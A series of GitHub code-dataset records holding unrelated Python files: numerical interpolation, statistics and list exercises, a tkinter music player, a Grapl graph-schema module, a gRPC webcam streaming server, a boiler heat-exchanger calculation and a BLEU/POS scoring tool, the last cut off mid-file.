n):\r\n# x[i] = input(\"Enter value for x[{0}] : \".format(i))\r\n# for i in range(0, n):\r\n# y[i][0] = input(\"Enter value for y[{0}] : \".format(i))\r\n\r\nx = [1791, 1801, 1811, 1821, 1831]\r\ny[0][0] = 48\r\ny[1][0] = 65\r\ny[2][0] = 71\r\ny[3][0] = 83\r\ny[4][0] = 96\r\n\r\nestimate = float(input(\"Enter value to be estimated from given data : \"))\r\nh = float(x[1] - x[0]) # calculating h\r\nu = float((estimate - x[0]) / h)\r\ntot = y[0][0]\r\n\r\n\r\n# creating table\r\nfor i in range(1, n):\r\n for j in range(n - i):\r\n y[j][i] = y[j + 1][i - 1] - y[j][i - 1]\r\n\r\n# printing table\r\nfor i in range(n):\r\n print(x[i], end=\"\\t\")\r\n for j in range(n - i):\r\n print(y[i][j], end=\"\\t\")\r\n print(\"\")\r\n\r\n\r\nfor i in range(1, n):\r\n tot = tot + (u_cal(u, i) * y[0][i]) / math.factorial(int(i))\r\n\r\nprint(\"Estimated value of {0} is = {1}\".format(estimate, tot))","repo_name":"FocusBT/Numerical-Computing-Coded-Methods","sub_path":"Newton Forward Formula.py","file_name":"Newton Forward Formula.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23210902886","text":"\"\"\"\n Question 4 of the first exercise. Calculate Average Pregnancy Length for the first child and the other children\n separately, also mention the difference\n\"\"\"\n\nimport survey\n\n# create an instance of the Pregnancies table\ntable = survey.Pregnancies()\n\n# this table contains a list of records of type Pregnancy. Make sure to call the ReadRecords method on the table object\n# which will read the data file and store all the records.\ntable.ReadRecords()\n\nfirstChildCount = 0\nfirstChildPregnancyLengthSum = 0\nrestChildrenCount = 0\nrestChildrenPregnancyLengthSum = 0\n\nfor record in table.records:\n if record.birthord != 'NA':\n if record.birthord == 1:\n firstChildCount += 1\n firstChildPregnancyLengthSum += record.prglength\n else:\n restChildrenCount += 1\n restChildrenPregnancyLengthSum += record.prglength\n\n\naverageFirstChildPregnancyLength = 0 if firstChildCount == 0 else firstChildPregnancyLengthSum / firstChildCount\naverageRestChildrenPregnancyLength = 0 if restChildrenCount == 0 else restChildrenPregnancyLengthSum / restChildrenCount\n\nprint(\"Average Pregnancy length for the first child is {} and for rest of the children is {}\"\n .format(averageFirstChildPregnancyLength, averageRestChildrenPregnancyLength))\nprint(\"And the difference is {:.2f}\".format(averageFirstChildPregnancyLength - averageRestChildrenPregnancyLength))","repo_name":"dmast3r/StatsWithPython","sub_path":"Chapter-1/Average Pregnancy Length.py","file_name":"Average Pregnancy Length.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35663994193","text":"from tkinter import *\n\n#importando o pillow\nfrom PIL import Image,ImageTk\n\n#importando o pygame\nimport pygame\nfrom pygame import mixer\n\nimport os\nimport random\n\nco0 = \"#f0f3f5\" # Preta\nco1 = \"#feffff\" # branca\nco2 = \"#3fb5a3\" # verde\nco3 = \"#2e2d2c\" # black\nco4 = \"#403d3d\" # letra\nco5 = \"#4a88e8\" # Azul \n\n\n#Criação da janela\n\njanela = Tk()\njanela.title(\"MySound\")\njanela.geometry('372x255')\njanela.configure(background=co1)\njanela.resizable(width=FALSE,height=FALSE)\n\n\nframe_esquerda = Frame(janela,width=170,height=150,bg=co3)\nframe_esquerda.grid(row=0,column=0,pady=1,padx=1,sticky=NSEW)\n\nframe_direita = 
Frame(janela,width=270,height=150,bg=co3)\nframe_direita.grid(row=0,column=1,pady=1,padx=0,sticky=NSEW)\n\n\nframe_baixo = Frame(janela,width=423,height=100,bg=co3)\nframe_baixo.grid(row=1,column=0,columnspan=3,pady=1,padx=0,sticky=NSEW)\n\n#configurando o frame do lado esquerdo\n\nimg_1 = Image.open('res/icon1.png')\nimg_1 = img_1.resize((130,130))\nimg_1 = ImageTk.PhotoImage(img_1)\n\nl_logo = Label(frame_esquerda, height=130,image=img_1,compound=LEFT,padx=0,anchor='nw',font=('ivy 16 bold'), bg=co3,fg=co3)\nl_logo.place(x=8,y=12)\n\n#criando funcoes\n\n#Musica anterior\ndef previous_music():\n tocando = l_rodando['text'] \n index = musicas.index(tocando)\n novo_index = index-1\n tocando = musicas[novo_index]\n mixer.music.load(tocando)\n mixer.music.play()\n listbox.delete(0,END)\n mostrar()\n listbox.select_set(novo_index)\n listbox.config(selectmode=SINGLE)\n l_rodando['text'] = tocando\n \n#Randomizando as musicas\ndef random_music():\n r = random.choice(musicas)\n novo_index = musicas.index(r)\n\n tocando = musicas[novo_index]\n \n mixer.music.load(tocando)\n mixer.music.play()\n\n #deletando os elementos na playlist\n listbox.delete(0,END)\n\n mostrar()\n\n listbox.select_set(novo_index)\n listbox.config(selectmode=SINGLE)\n l_rodando['text'] = tocando\n \n#Proxima Musica\ndef next_music():\n tocando = l_rodando['text'] \n index = musicas.index(tocando)\n\n novo_index = index+1\n\n tocando = musicas[novo_index]\n \n mixer.music.load(tocando)\n mixer.music.play()\n\n #deletando os elementos na playlist\n listbox.delete(0,END)\n\n mostrar()\n\n listbox.select_set(novo_index)\n listbox.config(selectmode=SINGLE)\n l_rodando['text'] = tocando\n \n\n#Tocar musica\ndef play_music():\n rodando = listbox.get(ACTIVE)\n l_rodando['text'] = rodando\n mixer.music.load(rodando)\n mixer.music.play()\n\n#Pausar musica\ndef pause_music():\n mixer.music.pause()\n#continuar musica\ndef continue_music():\n mixer.music.unpause()\n#Parar musica\ndef stop_music():\n mixer.music.stop()\n\n#Configurando o frame do lado direito\n\nlista = ['joao','lucas','andreia','joao','lucas','andreia','joao','lucas','andreia','joao','lucas','andreia','joao','lucas','andreia']\nlistbox = Listbox(frame_direita, width=22, height=10, selectmode=SINGLE, font=('arial 9 bold') , bg=co3, fg=co1)\nlistbox.grid(row=0,column=0)\n\ns = Scrollbar(frame_direita)\ns.grid(row=0,column=1,sticky=NSEW)\n\nlistbox.config(yscrollcommand=s.set)\ns.config(command=listbox.yview)\n\n\n#Configurando o frame de baixo\n\nl_rodando = Label(frame_baixo,text='Escolha uma musica na lista',width=44,justify=LEFT,anchor='nw',font=('ivy 10'), bg=co1,fg=co4)\nl_rodando.place(x=0,y=1)\n\nimg_2 = Image.open('res/2.png')\nimg_2 = img_2.resize((30,30))\nimg_2 = ImageTk.PhotoImage(img_2)\nb_anterior = Button(frame_baixo,command=previous_music,width=40,height=40,image=img_2,font=('ivy 10 bold'),relief=RAISED,overrelief=RIDGE, bg=co3,fg=co1)\nb_anterior.place(x=38,y=35)\n\n\n\nimg_3 = Image.open('res/3.png')\nimg_3 = img_3.resize((30,30))\nimg_3 = ImageTk.PhotoImage(img_3)\nb_play = Button(frame_baixo,command=play_music,width=40,height=40,image=img_3,font=('ivy 10 bold'),relief=RAISED,overrelief=RIDGE, bg=co3,fg=co1)\nb_play.place(x=84,y=35)\n\n\n\nimg_4 = Image.open('res/4.png')\nimg_4 = img_4.resize((30,30))\nimg_4 = ImageTk.PhotoImage(img_4)\nb_proxima = Button(frame_baixo,command=next_music,width=40,height=40,image=img_4,font=('ivy 10 bold'),relief=RAISED,overrelief=RIDGE, bg=co3,fg=co1)\nb_proxima.place(x=130,y=35)\n\n\n\nimg_5 = 
Image.open('res/5.png')\nimg_5 = img_5.resize((30,30))\nimg_5 = ImageTk.PhotoImage(img_5)\nb_pausar = Button(frame_baixo,command=pause_music,width=40,height=40,image=img_5,font=('ivy 10 bold'),relief=RAISED,overrelief=RIDGE, bg=co3,fg=co1)\nb_pausar.place(x=176,y=35)\n\n\n\nimg_6 = Image.open('res/6.png')\nimg_6 = img_6.resize((30,30))\nimg_6 = ImageTk.PhotoImage(img_6)\nb_continuar = Button(frame_baixo,command=continue_music,width=40,height=40,image=img_6,font=('ivy 10 bold'),relief=RAISED,overrelief=RIDGE, bg=co3,fg=co1)\nb_continuar.place(x=222,y=35)\n\n\n\nimg_7 = Image.open('res/7.png')\nimg_7 = img_7.resize((30,30))\nimg_7 = ImageTk.PhotoImage(img_7)\nb_stop = Button(frame_baixo,command=stop_music,width=40,height=40,image=img_7,font=('ivy 10 bold'),relief=RAISED,overrelief=RIDGE, bg=co3,fg=co1)\nb_stop.place(x=268,y=35)\n\nimg_8 = Image.open('res/8.png')\nimg_8 = img_8.resize((30,30))\nimg_8 = ImageTk.PhotoImage(img_8)\nb_random = Button(frame_baixo,command=random_music,width=40,height=40,image=img_8,font=('ivy 10 bold'),relief=RAISED,overrelief=RIDGE, bg=co3,fg=co1)\nb_random.place(x=314,y=35)\n\n\nos.chdir(r'C:/Users/lucas/OneDrive/Documentos/Musicas')\nmusicas = os.listdir()\n\ndef mostrar():\n for i in musicas:\n listbox.insert(END,i)\n\n\nmostrar()\n\n#Inicando mixer\nmixer.init()\n\n\n\n\njanela.mainloop()\n","repo_name":"LucasDSilva200/MyMusicPlayer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5454,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"16900197849","text":"filmes = [\"Os Vingadores\", \"Forest Gamp\", \"A procura da Felicidade\", \"Como eu era antes de você\", \"O lobo de Wall Street\", \"Dois Coelhos\", \"Up\", \"Lagoa Azul\"]\n\nfilmes_novos = [\"Histórias Cruzadas\", \"Esqueceram de mim\", \"Desventuras em Série \" \"Poderoso chefão\"]\n\nfilmes.extend(filmes_novos)\n\n\nfilmes.append(input(\"Filme:\"))\n\nprint(filmes)\n\nfilmes.sort()\nprint()\nprint(\"Ordenada: \\n\", filmes)\n\nfor i in filmes:\n print(i)\n\nprint()\n\nfilmes.reverse()\n\nfor i in filmes:\n print(i)\n\nfilmes.insert(', \"Pianista')\nfilmes.insert(10, \"Projeto X\")\n\nfor filme in filmes:\n print(filme)","repo_name":"rosifurst/Blue-Edtech_M-dulo01","sub_path":"filmes.py","file_name":"filmes.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8589507414","text":"from __future__ import annotations\nimport json\nimport logging\nimport os\nimport sys\n\nfrom typing import Any, TypeVar, Set, Type, Optional, List, Dict, Tuple, Union, Callable\n\nfrom grapl_analyzerlib.grapl_client import GraphClient\nfrom grapl_analyzerlib.node_types import (\n EdgeT,\n PropType,\n PropPrimitive,\n)\nfrom grapl_analyzerlib.queryable import Queryable\nfrom grapl_analyzerlib.schema import Schema\nfrom grapl_analyzerlib.viewable import Viewable\n\nBQ = TypeVar(\"BQ\", bound=\"BaseQuery\")\nBV = TypeVar(\"BV\", bound=\"BaseView\")\n\n\nGRAPL_LOG_LEVEL = os.getenv(\"GRAPL_LOG_LEVEL\")\nLEVEL = \"ERROR\" if GRAPL_LOG_LEVEL is None else GRAPL_LOG_LEVEL\nLOGGER = logging.getLogger(__name__)\nLOGGER.setLevel(LEVEL)\nLOGGER.addHandler(logging.StreamHandler(stream=sys.stdout))\n\n\nclass BaseSchema(Schema):\n def __init__(\n self,\n properties: Optional[Dict[str, PropType]] = None,\n edges: Optional[Dict[str, Tuple[EdgeT, str]]] = None,\n view: Union[Type[Viewable], Callable[[], Type[Viewable]]] = None,\n ):\n super(BaseSchema, 
self).__init__(\n {\n **(properties or {}),\n \"node_key\": PropType(\n PropPrimitive.Str, False, index=[\"hash\"], upsert=True\n ),\n \"last_index_time\": PropType(PropPrimitive.Int, False),\n },\n {\n **(edges or {}),\n },\n view or BaseView,\n )\n\n @staticmethod\n def get_display_property() -> str:\n return \"dgraph_type\"\n\n def generate_type(self) -> str:\n dgraph_builtins = {\"dgraph.type\", \"uid\"}\n\n property_names = [\n p for p in self.properties.keys() if p and p not in dgraph_builtins\n ]\n property_names.extend(self.edges.keys())\n linebreak = \"\\n\" + (\"\\t\" * 4)\n property_str = f\"{linebreak}\".join(property_names)\n type_str = f\"\"\"\n type {self.self_type()} {{\n {property_str}\n }}\n \"\"\"\n return type_str\n\n def generate_schema(self) -> str:\n predicates = []\n dgraph_builtins = {\"dgraph.type\", \"uid\"}\n for prop_name, prop_type in self.properties.items():\n if prop_name in dgraph_builtins:\n continue\n try:\n prim_str = prop_type.prop_type_str()\n index_str = prop_type.prop_index_str()\n predicates.append(f\"{prop_name}: {prim_str} {index_str} .\")\n except Exception as e:\n LOGGER.error(f\"Failed to generate property schema {prop_name} {e}\")\n raise e\n\n for edge_name, (edge_t, r_name) in self.edges.items():\n if not edge_name:\n continue\n\n # Given an edge like ('bin_file', OneToMany, 'spawned_from')\n # That's \"one\" bin_file (ie: uid) to many spawned_from (ie: [uid])\n # which is to say that \"from many\" implies [uid]\n if edge_t.is_from_many():\n predicates.append(f\"{edge_name}: [uid] .\")\n else:\n predicates.append(f\"{edge_name}: uid .\")\n\n return \"\\n\".join(predicates)\n\n @staticmethod\n def self_type() -> str:\n return \"Base\"\n\n\nclass BaseQuery(Queryable[BV, BQ]):\n @classmethod\n def node_schema(cls) -> \"Schema\":\n return BaseSchema()\n\n\nV = TypeVar(\"V\", bound=\"Viewable\")\n\n\nclass BaseView(Viewable[BV, BQ]):\n queryable = BaseQuery\n\n def __init__(\n self,\n uid: int,\n node_key: str,\n graph_client: Any,\n node_types: Set[str],\n **kwargs,\n ):\n super().__init__(uid, node_key, graph_client, **kwargs)\n self.node_types = node_types\n self.uid = uid\n self.node_key = node_key\n\n def into_view(self, v: Type[\"V\"]) -> Optional[\"V\"]:\n if v.node_schema().self_type() in self.node_types:\n self.queryable = v.queryable\n node_types = self.node_types.union(self.predicates.get(\"node_types\", set()))\n predicates_without_node_types = self.predicates.copy()\n predicates_without_node_types.pop(\"node_types\", None)\n return v(\n uid=self.uid,\n node_key=self.node_key,\n graph_client=self.graph_client,\n node_types=node_types,\n **predicates_without_node_types,\n )\n return None\n\n @staticmethod\n def from_node_key(graph_client: GraphClient, node_key: str) -> \"Optional[BaseView]\":\n self_node = BaseQuery().with_node_key(eq=node_key).query_first(graph_client)\n\n return self_node\n\n @classmethod\n def node_schema(cls) -> \"Schema\":\n return BaseSchema({}, {}, BaseView)\n\n def _expand(self, edge_str: Optional[List[str]] = None):\n # get the raw dictionary for this type\n if edge_str:\n edge_filters = \" AND \" + \" AND \".join(edge_str or [])\n else:\n edge_filters = \"\"\n query = f\"\"\"\n query q0($a: string) {{\n edges(func: eq(node_key, $a) , first: 1) {{\n uid\n dgraph.type\n node_key\n expand(_all_) @filter(has(dgraph.type) AND has(node_key) {edge_filters}) {{\n uid\n dgraph.type\n expand(_all_)\n }}\n }}\n\n properties(func: eq(node_key, $a) , first: 1) {{\n uid\n dgraph.type\n expand(_all_)\n }}\n }}\n \"\"\"\n 
txn = self.graph_client.txn(read_only=True, best_effort=True)\n\n try:\n qres = json.loads(txn.query(query, variables={\"$a\": self.node_key}).json)\n finally:\n txn.discard()\n\n d = qres.get(\"edges\")\n if d:\n self_node = BaseView.from_dict(d[0], self.graph_client)\n self.predicates = {**self.predicates, **self_node.predicates}\n\n d = qres.get(\"properties\")\n if d:\n self_node = BaseView.from_dict(d[0], self.graph_client)\n self.predicates = {**self.predicates, **self_node.predicates}\n\n return None\n\n def to_adjacency_list(self):\n from grapl_analyzerlib.viewable import traverse_view_iter\n from collections import defaultdict\n\n node_dicts = defaultdict(dict)\n edges = defaultdict(list)\n for node in traverse_view_iter(self):\n node_dict = node.to_dict()\n node_dicts[node_dict[\"node\"][\"node_key\"]] = node_dict[\"node\"]\n edges[node_dict[\"node\"][\"node_key\"]].extend(node_dict[\"edges\"])\n\n return {\"nodes\": node_dicts, \"edges\": edges}\n\n def to_dict(self):\n node_dict = {\n \"uid\": self.uid,\n \"node_key\": self.node_key,\n \"dgraph.type\": self.node_schema().self_type(),\n }\n self_key = self.node_key\n edges = []\n for predicate_name, predicate in self.predicates.items():\n if not predicate:\n continue\n\n if isinstance(predicate, Viewable):\n edges.append(\n {\n \"from\": self_key,\n \"edge_name\": predicate_name,\n \"to\": predicate.node_key,\n }\n )\n continue\n elif isinstance(predicate, list) and isinstance(predicate[0], Viewable):\n for p in predicate:\n edges.append(\n {\n \"from\": self_key,\n \"edge_name\": predicate_name,\n \"to\": p.node_key,\n }\n )\n continue\n else:\n if isinstance(predicate, set):\n node_dict[predicate_name] = list(predicate)\n else:\n if not isinstance(predicate, Viewable) and not (\n isinstance(predicate, list)\n and isinstance(predicate[0], Viewable)\n ):\n node_dict[predicate_name] = predicate\n\n return {\"node\": node_dict, \"edges\": edges}\n\n # def expand_neighbors(self, filter):\n # # get the raw dictionary for this type\n # query = f\"\"\"\n # query res($a: string)\n # {{\n # query(func: uid($a, first: 1) {{\n # expand(_all_)\n # }}\n # }}\n # \"\"\"\n # txn = self.graph_client.txn(read_only=True, best_effort=True)\n #\n # try:\n # res = txn.query(query, variables={\"$a\": self.uid})\n # res = json.loads(res.json)['query']\n # if not res:\n # return\n #\n # if isinstance(res, list):\n # self_node = BaseView.from_dict(res[0], self.graph_client)\n # else:\n # self_node = BaseView.from_dict(res, self.graph_client)\n # self.predicates = {**self_node.predicates, **self.predicates}\n # finally:\n # txn.discard()\n","repo_name":"macasieb/grapl","sub_path":"src/python/grapl_analyzerlib/grapl_analyzerlib/nodes/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":9101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"10515673840","text":"#!/usr/bin/env python\n\n################################################################################\n#\n# A simple script to count the number of sentences and tokens in a given\n# TreeBank file. 
Simply provide the filenames as the input and the number of\n# sentences will first be output followed by the number of tokens across all\n# TreeBanks.\n#\n################################################################################\n\nfrom lib.conll import TreeBank\n\nimport os\nimport sys\n\nif len(sys.argv) < 2:\n    raise TypeError('Have to count at least one file!')\n\nfilenames = sys.argv[1:]\ntb = TreeBank()\n\ns_count = 0\nt_count = 0\nfor fn in filenames:\n    for sentence in tb.genr(fn):\n        s_count += 1\n        t_count += len(sentence.words)\n\nprint('{} sentences'.format(s_count))\nprint('{} tokens'.format(t_count))\n","repo_name":"matgrioni/conll-inconsistency","sub_path":"tb-size.py","file_name":"tb-size.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"17387025980","text":"# Send the camera feed to connected clients\n\n#============================================================\n# import packages\n#============================================================\nfrom concurrent import futures\nimport grpc\nimport Datas_pb2\nimport Datas_pb2_grpc\nimport time\nimport cv2\nimport base64\nimport sys\n\n#============================================================\n# property\n#============================================================\n# Set up the camera\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n\ncaptureBuffer = None\n\n\n#============================================================\n# class\n#============================================================\n# Server class\nclass Greeter(Datas_pb2_grpc.MainServerServicer):\n\n\t#==========\n\tdef __init__(self):\n\t\tpass\n\n\t#==========\n\tdef getStream(self, request_iterator, context):\n\n\t\tfor req in request_iterator:\n\n\t\t\t# Print the request message\n\t\t\tprint(\"request message = \", req.msg)\n\n\t\t\twhile True:\n\n\t\t\t\t# Convert to grayscale\n\t\t\t\tgray = cv2.cvtColor(captureBuffer, cv2.COLOR_BGR2GRAY)\n\n\t\t\t\t# Encode the frame as jpg\n\t\t\t\tret, buf = cv2.imencode('.jpg', gray)\n\t\t\t\tif ret != 1:\n\t\t\t\t\treturn\n\t\t\t\t\n\t\t\t\t# base64-encode if the image needs to be handled as a string\n\t\t\t\t# b64e = base64.b64encode(buf)\n\t\t\t\t#print(\"base64 encode size : \", sys.getsizeof(b64e))\n\n\t\t\t\t# Send the data\n\t\t\t\tyield Datas_pb2.Reply(datas = buf.tobytes())\n\n\t\t\t\t# Cap at 60 FPS\n\t\t\t\ttime.sleep(1/ 60)\n\n\n\n#============================================================\n# functions\n#============================================================\ndef serve():\n\n\t# Create the server\n\tserver = grpc.server(futures.ThreadPoolExecutor(max_workers = 10))\n\tDatas_pb2_grpc.add_MainServerServicer_to_server(Greeter(), server)\n\n\t# Set the port\n\tserver.add_insecure_port('[::]:50051')\n\n\t# Start serving\n\tserver.start()\n\n\tprint('server start')\n\n\twhile True:\n\t\ttry:\n\t\t\t# Read from the camera feed\n\t\t\tret, frame = cap.read()\n\t\t\tif ret != 1:\n\t\t\t\tcontinue\n\n\t\t\tglobal captureBuffer\n\t\t\tcaptureBuffer = frame\n\n\t\t\t# Show a preview window\n\t\t\tcv2.imshow('Capture Image', captureBuffer)\n\n\t\t\t# Exit with the ESC key\n\t\t\tk = cv2.waitKey(1)\n\t\t\tif k == 27:\n\t\t\t\tserver.stop(0)\n\t\t\t\tbreak\n\n\t\t\ttime.sleep(0)\n\n\t\texcept KeyboardInterrupt:\n\t\t\tserver.stop(0)\n\n\n\n#============================================================\n# main\n#============================================================\nif __name__ == '__main__':\n\tserve()\n\n#============================================================\n# after the App 
exit\n#============================================================\ncap.release()\ncv2.destroyAllWindows()","repo_name":"Iwanaka/Python_Grpc_VideoStream_Sample","sub_path":"VideoStream_fromServer_Sample/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"fr","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"9266986685","text":"import math\nfrom . import newton_method\nfrom pyXSteam.XSteam import XSteam\nWaterSteam = XSteam(XSteam.UNIT_SYSTEM_MKS)\n\n\nclass VZP:\n def __init__(self, boiler, type, name, unknown, stat, tipdvizh, vii, tii, F, fg, fi_pp,\n delta_alfa, ksi0, delta_ksi, wg, wp, air_number, gaz_number):\n self.vi = 1\n self.ti = 1\n self.Hi = 1\n self.hi = 1\n self.k = 0\n self.deltat = 0\n self.Qb = 0\n self.Br = 1\n self.Pi = 1\n self.Pii = 1\n self.Bi_air = 1\n self.Bii_air = 1\n self.fi = 1\n self.bettagvii = 1\n self.bettagvi = 1\n self.Qlvh = 1\n self.Ql = 1\n self.Qlvyh = 1\n self.alfai = 1\n self.alfaii = 1\n self.vc_rec = 0\n self.H_rec = 0\n self.Vg = 1\n ##########################\n self.boiler = boiler\n self.type = type\n self.name = name\n self.unknown = unknown\n self.tipdvizh = tipdvizh\n self.vii = vii\n self.tii = tii\n self.Hii = math.nan\n self.hii = math.nan\n self.F = F\n self.fg = fg\n self.fi_pp = fi_pp\n self.ksi0 = ksi0\n self.delta_ksi = delta_ksi\n self.wg = wg\n self.wp = wp\n self.air_number = air_number\n self.gaz_number = gaz_number\n self.delta_alfa = delta_alfa\n self.stat = stat\n self.all = all = {\n 'Hi' : 'Hi',\n 'hi' : 'hi_air',\n 'Hii' : 'Hii',\n 'hii' : 'hii_air',\n 'F' : 'F',\n }\n self.varia = varia = list(set(all.values()) - set(stat) - set(unknown))\n self.unknown_local = unknown_local = list(key for key, value in all.items() if value in unknown)\n\n Bi = property(lambda self: self.Br, lambda self, value: setattr(self, 'Br', value))\n Bii = property(lambda self: self.Br, lambda self, value: setattr(self, 'Br', value))\n Hi_air = property(lambda self: self.hi, lambda self, value: setattr(self, 'hi', value))\n Hii_air = property(lambda self: self.hii, lambda self, value: setattr(self, 'hii', value))\n ti_air = property(lambda self: self.ti, lambda self, value: setattr(self, 'ti', value))\n tii_air = property(lambda self: self.tii, lambda self, value: setattr(self, 'tii', value))\n\n def __Qb_method(self):\n\n self.Qb = self.k * self.deltat * self.F / 1000\n\n def __k_method(self, wg, wp):\n ksi = self.ksi0 + self.delta_ksi\n k = 3 * ksi * math.pow(wg + 0.5 * wp, 0.8)\n return k\n\n def __vzpiter(self, argum):\n boiler, alfai, vc_rec, H_rec, unknown, vi, ti, alfaii, vii, tii, unknown_local, tipdvizh,\\\n wg, wp, delta_alfa, Br, fi, Ql, bettagvii = \\\n self.boiler, self.alfai, self.vc_rec, self.H_rec, self.unknown, self.vi, self.ti, self.alfaii,\\\n self.vii, self.tii, self.unknown_local, self.tipdvizh, self.wg, self.wp, self.delta_alfa, self.Br,\\\n self.fi, self.Ql, self.bettagvii\n\n access = False\n self.Hi = Hi = argum['Hi']\n self.Hii = Hii = argum['Hii']\n self.hi = hi = argum[\"hi_air\"]\n self.hii = hii = argum[\"hii_air\"]\n self.F = F = argum[\"F\"]\n\n prov_argum = {\n 'Hii' : 0,\n 'hii_air' : 0,\n }\n self.vi = vi = boiler.vgaz(Hi, alfai, vc_rec, H_rec) if 'Hi' in unknown else self.vi\n self.ti = ti = boiler.tAIR(hi) if 'hi_air' in unknown else self.ti\n self.vii = vii = boiler.vgaz(Hii, alfaii, vc_rec, H_rec) if 'Hii' in unknown else self.vii\n self.tii = tii = boiler.tAIR(hii) if 'hii_air' in unknown else self.tii\n\n self.vi, self.ti, 
self.vii, self.tii, access = vi, ti, vii, tii, access = newton_method.restrictions(unknown_local, tipdvizh, access, vi, ti, vii, tii)\n if access == True:\n self.Hi = Hi = argum['Hi'] = boiler.HGAZ(vi, alfai, vc_rec, H_rec) if 'Hi' in unknown else self.Hi\n self.Hii = Hii = argum['Hii'] = boiler.HGAZ(vii, alfaii, vc_rec, H_rec) if 'Hii' in unknown else self.Hii\n self.hi = hi = argum['hi_air'] = boiler.HAIR(ti) if 'hi_air' in unknown else self.hi\n self.hii = hii = argum['hii_air'] = boiler.HAIR(tii) if 'hii_air' in unknown else self.hii\n\n k = self.__k_method(wg, wp)\n deltat = boiler.tempnap(tipdvizh, vi, ti, vii, tii)\n Hpris = boiler.HAIR((ti + tii) / 2)\n prov_argum[\"Hii\"] = Hi + delta_alfa * Hpris - k * F * deltat / (Br * 1000 * fi)\n prov_argum[\"hii_air\"] = hi + ((k * F * deltat) / (Br * 1000) + Ql) / (bettagvii + delta_alfa / 2)\n\n self.vi, self.ti, self.vii, self.tii, self.k, self.deltat = vi, ti, vii, tii, k, deltat\n\n return prov_argum\n\n def __kornivzp(self):\n boiler, bettagvi, delta_alfa, Bi_air, Qlvh, fi_pp, alfai, vi, ti, vii, tii, F, unknown, vc_rec, \\\n H_rec, Hi, hi, Hii, hii = \\\n self.boiler, self.bettagvi, self.delta_alfa, self.Bi_air, self.Qlvh, self.fi_pp, self.alfai, \\\n self.vi, self.ti, self.vii, self.tii, self.F, self.unknown, self.vc_rec, self.H_rec, \\\n self.Hi, self.hi, self.Hii, self.hii\n\n self.bettagvii = bettagvii = bettagvi - delta_alfa\n self.Bii_air = Bii_air = Bi_air\n self.Qlvyh = Qlvyh = Qlvh * (1 - fi_pp)\n self.Ql = Ql = Qlvh - Qlvyh\n self.alfaii = alfaii = alfai + delta_alfa\n\n argum_temp = {\n 'Hi' : vi,\n 'hi_air': ti,\n 'Hii': vii,\n 'hii_air': tii,\n 'F': F,\n }\n\n newton_method.argum_nan(argum_temp)\n\n newton_method.argum_pre(unknown, argum_temp)\n\n self.vi = vi = argum_temp[\"Hi\"]\n self.ti = ti = argum_temp[\"hi_air\"]\n self.vii = vii = argum_temp[\"Hii\"]\n self.tii = tii = argum_temp[\"hii_air\"]\n self.F = F = argum_temp[\"F\"]\n\n argum = {\n 'Hi' : boiler.HGAZ(vi, alfai, vc_rec, H_rec) if 'Hi' in unknown or math.isnan(Hi) else Hi,\n 'hi_air' : boiler.HAIR(ti) if 'hi_air' in unknown or math.isnan(hi) else hi,\n 'Hii' : boiler.HGAZ(vii, alfaii, vc_rec, H_rec) if 'Hii' in unknown or math.isnan(Hii) else Hii,\n 'hii_air': boiler.HAIR(tii) if 'hii_air' in unknown or math.isnan(hii) else hii,\n 'F' : F,\n }\n\n newton_method.newton_method(self.__vzpiter, argum, unknown)\n #self.Hi, self.hi, self.Hii, self.hii, self.F = argum.values()\n\n def poisk_korney(self):\n Br, boiler, alfai, delta_alfa = self.Br, self.boiler, self.alfai, self.delta_alfa\n if math.isnan(Br):\n self.Br = 20\n self.vc_rec = boiler.vc_rec\n self.H_rec= boiler.H_rec\n self.Vg = boiler.Vg(alfai + delta_alfa / 2, boiler.Vg_rec)\n self.fi = boiler.fi\n self.__kornivzp()\n self.__Qb_method()\n\n","repo_name":"Karceri/BoilerCalc_Django","sub_path":"boiler_calc/thermal_calculation/classes/vzp.py","file_name":"vzp.py","file_ext":"py","file_size_in_byte":6799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2406510069","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom unittest import skip\nfrom weakref import ref\nfrom nltk.translate.bleu_score import sentence_bleu\nimport spacy\nimport tkinter.scrolledtext as st\nimport os\nimport subprocess\nimport time\nfrom tkinter import filedialog as fd\nimport matplotlib.pyplot as plt\nimport matplotlib\nmatplotlib.use(\"TkAgg\")\nfrom matplotlib.backends.backend_tkagg import (FigureCanvasTkAgg, \nNavigationToolbar2Tk)\nfrom matplotlib.figure import 
Figure\nimport numpy\nfrom tkinter.simpledialog import askstring as AS\nfrom threading import Thread\n\ndef slicePersonal(li):\n \n li = list(filter(lambda a: a != \" \\n\", li))\n \n lll = li\n counter = 4\n for i in lll:\n if countercandidateLength):\n while(len(referencePOSlist) > counter):\n try:\n if(candidatePOSlist[counter]==referencePOSlist[counter]):\n returnDictionary['correctly placed tags'].append(f'{candidatePOSlist[counter]} {counter}')\n correctcounter+=1\n except:\n skip\n finally: \n counter+=1 \n \n else:\n while(candidateLength > counter):\n try:\n if(referencePOSlist[counter]==candidatePOSlist[counter]):\n returnDictionary['correctly placed tags'].append(f'{candidatePOSlist[counter]} {counter}')\n correctcounter+=1\n except:\n skip\n finally:\n counter+=1 \n \n #Calculating the final score. Mistakes is calculated by subtracting the correctcounter from the length of the candidate text\n mistakes = candidateLength - correctcounter\n #partial is calculated by bleu score divided by the candidate length\n partial = netscore/candidateLength\n #deduction is calculated 